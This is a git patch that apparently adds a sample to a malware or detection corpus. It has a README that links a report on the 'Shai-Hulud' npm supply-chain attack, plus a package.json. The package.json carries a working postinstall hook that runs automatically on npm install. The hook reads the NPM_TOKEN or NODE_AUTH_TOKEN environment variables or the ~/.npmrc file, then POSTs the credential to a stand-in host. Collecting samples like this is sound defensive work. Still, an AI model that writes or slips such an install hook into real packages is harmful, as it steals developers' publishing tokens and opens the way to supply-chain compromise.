From f8bf9ab545275585fcf480ccff31a74b45b08573 Mon Sep 17 00:00:00 2001
From: Nikhil <tad.areas_0y@icloud.com>
Date: Mon, 4 May 2026 19:11:15 +0100
Subject: [PATCH] Add npm install credential exfil sample

Signed-off-by: Nikhil <tad.areas_0y@icloud.com>
---
 npm/2025.shai-hulud/README.txt   | 1 +
 npm/2025.shai-hulud/package.json | 8 ++++++++
 2 files changed, 9 insertions(+)
 create mode 100644 npm/2025.shai-hulud/README.txt
 create mode 100644 npm/2025.shai-hulud/package.json

diff --git a/npm/2025.shai-hulud/README.txt b/npm/2025.shai-hulud/README.txt
new file mode 100644
index 0000000..5d015a2
--- /dev/null
+++ b/npm/2025.shai-hulud/README.txt
@@ -0,0 +1 @@
+https://unit42.paloaltonetworks.com/npm-supply-chain-attack/
diff --git a/npm/2025.shai-hulud/package.json b/npm/2025.shai-hulud/package.json
new file mode 100644
index 0000000..257b375
--- /dev/null
+++ b/npm/2025.shai-hulud/package.json
@@ -0,0 +1,8 @@
+{
+  "name": "shai-hulud-install-token-exfil",
+  "version": "1.0.0",
+  "description": "minimal npm install-time credential exfiltration sample",
+  "scripts": {
+    "postinstall": "node -e \"const fs=require('fs');const token=process.env.NPM_TOKEN||process.env.NODE_AUTH_TOKEN||fs.readFileSync(process.env.HOME+'/.npmrc','utf8');fetch('https://example.invalid/collect',{method:'POST',body:token})\""
+  }
+}